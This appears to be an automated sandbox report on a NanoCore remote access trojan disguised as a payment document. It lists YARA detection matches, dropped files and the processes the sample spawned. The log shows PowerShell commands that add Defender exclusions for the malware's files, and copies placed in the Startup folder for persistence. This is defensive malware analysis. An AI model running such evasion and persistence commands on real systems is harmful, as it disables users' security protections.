              Source: PAYMENT-SWIFTCOPY.exe, type: SAMPLEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
              Source: 0.0.PAYMENT-SWIFTCOPY.exe.830000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
              Source: 0.0.PAYMENT-SWIFTCOPY.exe.830000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
              Source: 0.0.PAYMENT-SWIFTCOPY.exe.92c39e8.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
              Source: 0.0.PAYMENT-SWIFTCOPY.exe.92c39e8.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0.0.PAYMENT-SWIFTCOPY.exe.92c39e8.15.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
              Source: 22.0.???????????????.exe.af0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
              Source: 0.0.PAYMENT-SWIFTCOPY.exe.92c39e8.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
              Source: 0.0.PAYMENT-SWIFTCOPY.exe.92c39e8.15.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
              Source: 0000001D.00000002.558493568.000000000542F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
              Source: 0000001D.00000002.558493568.000000000542F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
              Source: 0000001F.00000002.573231147.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
              Source: 0000001F.00000002.573231147.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
              Source: 0000001F.00000002.585152245.0000000003234000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
              Source: 0000001F.00000002.581504296.00000000017D0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
              Source: 0000001F.00000002.581504296.00000000017D0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0000001F.00000002.592329083.0000000006CF0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
              Source: 0000001F.00000002.592329083.0000000006CF0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0000001F.00000002.581875298.0000000001840000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
              Source: 0000001F.00000002.581875298.0000000001840000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0000001F.00000002.581821312.0000000001830000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
              Source: 0000001F.00000002.581821312.0000000001830000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0000001F.00000002.590731801.0000000006560000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
              Source: 0000001F.00000002.590731801.0000000006560000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0000001D.00000002.561744812.000000000762B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
              Source: 0000001D.00000002.561744812.000000000762B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
              Source: 0000001F.00000002.581540754.00000000017E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
              Source: 0000001F.00000002.581540754.00000000017E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0000001F.00000002.592081977.0000000006CA0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
              Source: 0000001F.00000002.592081977.0000000006CA0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0000001F.00000002.590758914.0000000006570000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
              Source: 0000001F.00000002.590758914.0000000006570000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0000001F.00000002.590705398.0000000006550000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
              Source: 0000001F.00000002.590705398.0000000006550000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0000001F.00000002.590357866.0000000005C10000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
              Source: 0000001F.00000002.590357866.0000000005C10000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0000001F.00000002.590829272.0000000006590000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
              Source: 0000001F.00000002.590829272.0000000006590000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0000001F.00000002.590978202.00000000067E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
              Source: 0000001F.00000002.590978202.00000000067E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0000001F.00000002.589022737.00000000044E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
              Source: 0000001F.00000002.590674805.0000000006540000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
              Source: 0000001F.00000002.590674805.0000000006540000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0000001F.00000002.581787117.0000000001820000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
              Source: 0000001F.00000002.581787117.0000000001820000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0000001F.00000002.588590470.0000000004171000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
              Source: 00000000.00000000.407577726.00000000092C3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
              Source: 00000000.00000000.407577726.00000000092C3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
              Source: Process Memory Space: PAYMENT-SWIFTCOPY.exe PID: 3492, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
              Source: Process Memory Space: PAYMENT-SWIFTCOPY.exe PID: 3492, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
              Source: C:\Windows\Cursors\???????????????\svchost.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeFile created: C:\Windows\Cursors\???????????????Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.354164872.0000000002B90000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUltimate.dll2 vs PAYMENT-SWIFTCOPY.exe
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.352617039.0000000000832000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePayroll Management System.exeT vs PAYMENT-SWIFTCOPY.exe
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAlienRunPE.exe6 vs PAYMENT-SWIFTCOPY.exe
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs PAYMENT-SWIFTCOPY.exe
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407199760.0000000009191000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs PAYMENT-SWIFTCOPY.exe
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.407577726.00000000092C3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCgTm HpS.exe2 vs PAYMENT-SWIFTCOPY.exe
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.405085971.0000000008118000.00000004.00000010.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PAYMENT-SWIFTCOPY.exe
              Source: PAYMENT-SWIFTCOPY.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeJump to behavior
              Source: classification engineClassification label: mal100.troj.adwa.expl.evad.winEXE@97/44@13/6
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeCode function: 3_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,3_2_00401306
              Source: PAYMENT-SWIFTCOPY.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeCode function: 3_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,3_2_0040A33B
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.393368692.0000000005CB6000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
              Source: PAYMENT-SWIFTCOPY.exeReversingLabs: Detection: 25%
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeFile read: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe'
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe' /SpecialRun 4101d8 4952
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
              Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -Force
              Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -Force
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -Force
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe'
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -Force
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
